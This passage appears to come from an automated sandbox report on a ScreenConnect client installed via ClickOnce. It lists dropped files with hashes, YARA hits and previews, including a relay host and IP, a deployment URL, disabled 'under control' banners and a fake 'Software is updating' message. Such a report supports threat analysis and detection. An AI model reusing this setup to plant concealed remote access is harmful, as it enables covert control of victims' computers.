                                                                                                                                                                                                                                                      SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                      SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):600864
                                                                                                                                                                                                                                                      Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                      MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                      SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                      SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197120
                                                                                                                                                                                                                                                      Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                      MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                      SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                      SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                      SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):359
                                                                                                                                                                                                                                                      Entropy (8bit):4.83753806903797
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l10+HwercYn:rHy2DLI4MWoHO8L9cAgRMZRCl1FHcY
                                                                                                                                                                                                                                                      MD5:17702A9E63BED7438F3217D594D6E35C
                                                                                                                                                                                                                                                      SHA1:7C556F344A57D5933A528F8B8CFD0363F15AE0E3
                                                                                                                                                                                                                                                      SHA-256:8BFD7D9E0BAC6BDE538DFBE31E8919933547F30248E747C5B38EB84472DF3701
                                                                                                                                                                                                                                                      SHA-512:642BB2D85ECB653DA779AFFAA4285612BC7EB08383967DB16D9F9CA709F6A46280E6E6C7605E850E5AEC28043828826CA6948982591C310374119785784B303B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.?....=Software is updating... Please do not turn off your computer!..
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):256
                                                                                                                                                                                                                                                      Entropy (8bit):4.878405169379307
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJkw:rHy2DLI4MWoj12eKfKCKB
                                                                                                                                                                                                                                                      MD5:B5450F2285052D7D31714E92BAE6143E
                                                                                                                                                                                                                                                      SHA1:0904C6FE250983A97D5210DFEACCB1C1CF34D643
                                                                                                                                                                                                                                                      SHA-256:23054E289EB585EB0314C44FD753ED3803C012E06B954926F3FC7167A370F928
                                                                                                                                                                                                                                                      SHA-512:79DA469F0C4ACB50D9B399086ED171C69E00C4CF5CB8A2089FD49F5864C1BF46E8434FB23CD210ABB83B88FF06E435A92C8E926B435BFB03EA207D5D7069723E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):50133
                                                                                                                                                                                                                                                      Entropy (8bit):4.759054454534641
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                                                                      MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                                                                      SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                                                                      SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                                                                      SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26722
                                                                                                                                                                                                                                                      Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                                                                      MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                                                                      SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                                                                      SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                                                                      SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2089
                                                                                                                                                                                                                                                      Entropy (8bit):4.688974504275539
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHK:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHY
                                                                                                                                                                                                                                                      MD5:6E88FAD97F4CFC0339D8D71F55326EDF
                                                                                                                                                                                                                                                      SHA1:7FE09E6D87B7CA210C8D7AFA9D69380528A6D4F2
                                                                                                                                                                                                                                                      SHA-256:F09E170444003576AD24985C8B4873E7CBDC18863A4943A1FDEB0E3249812806
                                                                                                                                                                                                                                                      SHA-512:023175F24C652E73946A01DB84579BAF00D4447AFA01CD2EA09820964DCA10D9C24C7DD7F37109A836996477B4C9804B75830C95A790B5598564395272F98A15
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):562
                                                                                                                                                                                                                                                      Entropy (8bit):5.070220378377067
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDmO/vXbAa3xT:2dL9hK6E46YPoXVvH
                                                                                                                                                                                                                                                      MD5:ACEA838653B74CFB402FC34FFDE3EEE5
                                                                                                                                                                                                                                                      SHA1:53972E41BBD01D64CF5FF39B18A98931AB73321F
                                                                                                                                                                                                                                                      SHA-256:2F1FFCDA60109D0274AC5D5AE0E655E569D8B6D916280FBDD96DB7C3F482D6C3
                                                                                                                                                                                                                                                      SHA-512:BCA06DBBF78F78EE6FA37A8C26492B6596A878DF4DABFFAFFA7AC07E3EEFECDE9619A033D609198F8C3420F69840DC4329359403A34EC0CA64FF929471AB19C4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a29%3a52</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):562
                                                                                                                                                                                                                                                      Entropy (8bit):5.070220378377067
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a29%3a52</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                      Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1373
                                                                                                                                                                                                                                                      Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):1662
                                                                                                                                                                                                                                                      Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):847
                                                                                                                                                                                                                                                      Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (618), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14968
                                                                                                                                                                                                                                                      Entropy (8bit):3.818445481196692
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
Preview:PLATFORM VERSION INFO.. Windows : 10.0.19045.0 (Win32NT).. Common Language Runtime : 4.0.30319.42000.. System.Deployment.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. clr.dll : 4.8.4515.0 built by: NET48REL1LAST_C.. dfdll.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. dfshim.dll : 10.0.19041.30000 (WinBuild.160101.0800)....SOURCES.. Deployment url : https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b41
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):118229
                                                                                                                                                                                                                                                      Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197120
                                                                                                                                                                                                                                                      Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                      MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                      SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                      SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                      SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                                                                                                      Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                      MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                      SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                      SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                      SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                      Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                      MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                      SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                      SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                      SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1632
